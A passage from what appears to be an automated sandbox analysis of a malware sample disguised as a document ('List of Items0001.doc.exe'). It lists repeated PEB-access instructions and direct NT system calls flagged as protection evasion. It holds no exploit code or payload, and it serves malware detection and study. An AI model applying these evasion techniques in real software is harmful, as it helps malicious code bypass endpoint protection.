        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269666D mov esi, dword ptr fs:[00000030h]3_2_3269666D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269666D mov eax, dword ptr fs:[00000030h]3_2_3269666D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269666D mov eax, dword ptr fs:[00000030h]3_2_3269666D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32673660 mov eax, dword ptr fs:[00000030h]3_2_32673660
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32673660 mov eax, dword ptr fs:[00000030h]3_2_32673660
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32673660 mov eax, dword ptr fs:[00000030h]3_2_32673660
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32657662 mov eax, dword ptr fs:[00000030h]3_2_32657662
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32657662 mov eax, dword ptr fs:[00000030h]3_2_32657662
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32657662 mov eax, dword ptr fs:[00000030h]3_2_32657662
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32660670 mov eax, dword ptr fs:[00000030h]3_2_32660670
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2670 mov eax, dword ptr fs:[00000030h]3_2_326A2670
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2670 mov eax, dword ptr fs:[00000030h]3_2_326A2670
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32663640 mov eax, dword ptr fs:[00000030h]3_2_32663640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267F640 mov eax, dword ptr fs:[00000030h]3_2_3267F640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267F640 mov eax, dword ptr fs:[00000030h]3_2_3267F640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267F640 mov eax, dword ptr fs:[00000030h]3_2_3267F640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269C640 mov eax, dword ptr fs:[00000030h]3_2_3269C640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269C640 mov eax, dword ptr fs:[00000030h]3_2_3269C640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265D64A mov eax, dword ptr fs:[00000030h]3_2_3265D64A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265D64A mov eax, dword ptr fs:[00000030h]3_2_3265D64A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269265C mov eax, dword ptr fs:[00000030h]3_2_3269265C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269265C mov ecx, dword ptr fs:[00000030h]3_2_3269265C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269265C mov eax, dword ptr fs:[00000030h]3_2_3269265C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266965A mov eax, dword ptr fs:[00000030h]3_2_3266965A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266965A mov eax, dword ptr fs:[00000030h]3_2_3266965A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32695654 mov eax, dword ptr fs:[00000030h]3_2_32695654
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32665622 mov eax, dword ptr fs:[00000030h]3_2_32665622
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32665622 mov eax, dword ptr fs:[00000030h]3_2_32665622
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269C620 mov eax, dword ptr fs:[00000030h]3_2_3269C620
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32660630 mov eax, dword ptr fs:[00000030h]3_2_32660630
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269F63F mov eax, dword ptr fs:[00000030h]3_2_3269F63F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269F63F mov eax, dword ptr fs:[00000030h]3_2_3269F63F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32690630 mov eax, dword ptr fs:[00000030h]3_2_32690630
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270D62C mov ecx, dword ptr fs:[00000030h]3_2_3270D62C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270D62C mov ecx, dword ptr fs:[00000030h]3_2_3270D62C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270D62C mov eax, dword ptr fs:[00000030h]3_2_3270D62C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E8633 mov esi, dword ptr fs:[00000030h]3_2_326E8633
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E8633 mov eax, dword ptr fs:[00000030h]3_2_326E8633
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E8633 mov eax, dword ptr fs:[00000030h]3_2_326E8633
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269360F mov eax, dword ptr fs:[00000030h]3_2_3269360F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F3608 mov eax, dword ptr fs:[00000030h]3_2_326F3608
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F3608 mov eax, dword ptr fs:[00000030h]3_2_326F3608
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F3608 mov eax, dword ptr fs:[00000030h]3_2_326F3608
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F3608 mov eax, dword ptr fs:[00000030h]3_2_326F3608
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F3608 mov eax, dword ptr fs:[00000030h]3_2_326F3608
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F3608 mov eax, dword ptr fs:[00000030h]3_2_326F3608
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268D600 mov eax, dword ptr fs:[00000030h]3_2_3268D600
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268D600 mov eax, dword ptr fs:[00000030h]3_2_3268D600
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32734600 mov eax, dword ptr fs:[00000030h]3_2_32734600
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F607 mov eax, dword ptr fs:[00000030h]3_2_3271F607
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326596E0 mov eax, dword ptr fs:[00000030h]3_2_326596E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326596E0 mov eax, dword ptr fs:[00000030h]3_2_326596E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326656E0 mov eax, dword ptr fs:[00000030h]3_2_326656E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326656E0 mov eax, dword ptr fs:[00000030h]3_2_326656E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326656E0 mov eax, dword ptr fs:[00000030h]3_2_326656E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326866E0 mov eax, dword ptr fs:[00000030h]3_2_326866E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326866E0 mov eax, dword ptr fs:[00000030h]3_2_326866E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DC6F2 mov eax, dword ptr fs:[00000030h]3_2_326DC6F2
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DC6F2 mov eax, dword ptr fs:[00000030h]3_2_326DC6F2
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326606CF mov eax, dword ptr fs:[00000030h]3_2_326606CF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272A6C0 mov eax, dword ptr fs:[00000030h]3_2_3272A6C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327086C2 mov eax, dword ptr fs:[00000030h]3_2_327086C2
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268D6D0 mov eax, dword ptr fs:[00000030h]3_2_3268D6D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327286A8 mov eax, dword ptr fs:[00000030h]3_2_327286A8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327286A8 mov eax, dword ptr fs:[00000030h]3_2_327286A8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32668690 mov eax, dword ptr fs:[00000030h]3_2_32668690
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F68C mov eax, dword ptr fs:[00000030h]3_2_3271F68C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EC691 mov eax, dword ptr fs:[00000030h]3_2_326EC691
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32672760 mov ecx, dword ptr fs:[00000030h]3_2_32672760
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 mov eax, dword ptr fs:[00000030h]3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 mov eax, dword ptr fs:[00000030h]3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 mov eax, dword ptr fs:[00000030h]3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 mov eax, dword ptr fs:[00000030h]3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 mov eax, dword ptr fs:[00000030h]3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 mov eax, dword ptr fs:[00000030h]3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32690774 mov eax, dword ptr fs:[00000030h]3_2_32690774
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32664779 mov eax, dword ptr fs:[00000030h]3_2_32664779
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32664779 mov eax, dword ptr fs:[00000030h]3_2_32664779
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270E750 mov eax, dword ptr fs:[00000030h]3_2_3270E750
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269174A mov eax, dword ptr fs:[00000030h]3_2_3269174A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32693740 mov eax, dword ptr fs:[00000030h]3_2_32693740
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269A750 mov eax, dword ptr fs:[00000030h]3_2_3269A750
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32682755 mov eax, dword ptr fs:[00000030h]3_2_32682755
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32682755 mov eax, dword ptr fs:[00000030h]3_2_32682755
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32682755 mov eax, dword ptr fs:[00000030h]3_2_32682755
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32682755 mov ecx, dword ptr fs:[00000030h]3_2_32682755
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32682755 mov eax, dword ptr fs:[00000030h]3_2_32682755
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32682755 mov eax, dword ptr fs:[00000030h]3_2_32682755
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32689723 mov eax, dword ptr fs:[00000030h]3_2_32689723
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B705 mov eax, dword ptr fs:[00000030h]3_2_3265B705
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B705 mov eax, dword ptr fs:[00000030h]3_2_3265B705
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B705 mov eax, dword ptr fs:[00000030h]3_2_3265B705
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B705 mov eax, dword ptr fs:[00000030h]3_2_3265B705
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268270D mov eax, dword ptr fs:[00000030h]3_2_3268270D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268270D mov eax, dword ptr fs:[00000030h]3_2_3268270D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268270D mov eax, dword ptr fs:[00000030h]3_2_3268270D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D700 mov ecx, dword ptr fs:[00000030h]3_2_3266D700
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F717 mov eax, dword ptr fs:[00000030h]3_2_3271F717
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272970B mov eax, dword ptr fs:[00000030h]3_2_3272970B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272970B mov eax, dword ptr fs:[00000030h]3_2_3272970B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266471B mov eax, dword ptr fs:[00000030h]3_2_3266471B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266471B mov eax, dword ptr fs:[00000030h]3_2_3266471B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268E7E0 mov eax, dword ptr fs:[00000030h]3_2_3268E7E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F7CF mov eax, dword ptr fs:[00000030h]3_2_3271F7CF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326607A7 mov eax, dword ptr fs:[00000030h]3_2_326607A7
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327317BC mov eax, dword ptr fs:[00000030h]3_2_327317BC
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272D7A7 mov eax, dword ptr fs:[00000030h]3_2_3272D7A7
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272D7A7 mov eax, dword ptr fs:[00000030h]3_2_3272D7A7
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272D7A7 mov eax, dword ptr fs:[00000030h]3_2_3272D7A7
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32691796 mov eax, dword ptr fs:[00000030h]3_2_32691796
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32691796 mov eax, dword ptr fs:[00000030h]3_2_32691796
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F478 mov eax, dword ptr fs:[00000030h]3_2_3271F478
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32668470 mov eax, dword ptr fs:[00000030h]3_2_32668470
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32668470 mov eax, dword ptr fs:[00000030h]3_2_32668470
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272A464 mov eax, dword ptr fs:[00000030h]3_2_3272A464
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670445 mov eax, dword ptr fs:[00000030h]3_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670445 mov eax, dword ptr fs:[00000030h]3_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670445 mov eax, dword ptr fs:[00000030h]3_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670445 mov eax, dword ptr fs:[00000030h]3_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670445 mov eax, dword ptr fs:[00000030h]3_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670445 mov eax, dword ptr fs:[00000030h]3_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D454 mov eax, dword ptr fs:[00000030h]3_2_3266D454
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D454 mov eax, dword ptr fs:[00000030h]3_2_3266D454
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D454 mov eax, dword ptr fs:[00000030h]3_2_3266D454
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D454 mov eax, dword ptr fs:[00000030h]3_2_3266D454
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D454 mov eax, dword ptr fs:[00000030h]3_2_3266D454
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D454 mov eax, dword ptr fs:[00000030h]3_2_3266D454
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268E45E mov eax, dword ptr fs:[00000030h]3_2_3268E45E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268E45E mov eax, dword ptr fs:[00000030h]3_2_3268E45E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268E45E mov eax, dword ptr fs:[00000030h]3_2_3268E45E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268E45E mov eax, dword ptr fs:[00000030h]3_2_3268E45E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268E45E mov eax, dword ptr fs:[00000030h]3_2_3268E45E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269D450 mov eax, dword ptr fs:[00000030h]3_2_3269D450
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269D450 mov eax, dword ptr fs:[00000030h]3_2_3269D450
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EF42F mov eax, dword ptr fs:[00000030h]3_2_326EF42F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EF42F mov eax, dword ptr fs:[00000030h]3_2_326EF42F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EF42F mov eax, dword ptr fs:[00000030h]3_2_326EF42F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EF42F mov eax, dword ptr fs:[00000030h]3_2_326EF42F

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtMapViewOfSection: Direct from: 0x77252C3C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtAllocateVirtualMemory: Direct from: 0x77252B1C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtResumeThread: Direct from: 0x772535CC
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtReadFile: Direct from: 0x772529FC
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtQuerySystemInformation: Direct from: 0x77252D1C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtNotifyChangeKey: Direct from: 0x77253B4C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtWriteVirtualMemory: Direct from: 0x77252D5C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtClose: Direct from: 0x77252A8C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtCreateKey: Direct from: 0x77252B8C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtSetInformationThread: Direct from: 0x77252A6C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtWriteVirtualMemory: Direct from: 0x7725482C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtAllocateVirtualMemory: Direct from: 0x7725480C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtSetInformationThread: Direct from: 0x77246319
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtQueryInformationProcess: Direct from: 0x77252B46
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtResumeThread: Direct from: 0x77252EDC
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtCreateUserProcess: Direct from: 0x7725363C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtProtectVirtualMemory: Direct from: 0x77252EBC
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtDelayExecution: Direct from: 0x77252CFC
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtOpenKeyEx: Direct from: 0x77252ABC
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtCreateFile: Direct from: 0x77252F0C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtQueryVolumeInformationFile: Direct from: 0x77252E4C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtDeviceIoControlFile: Direct from: 0x77252A0C
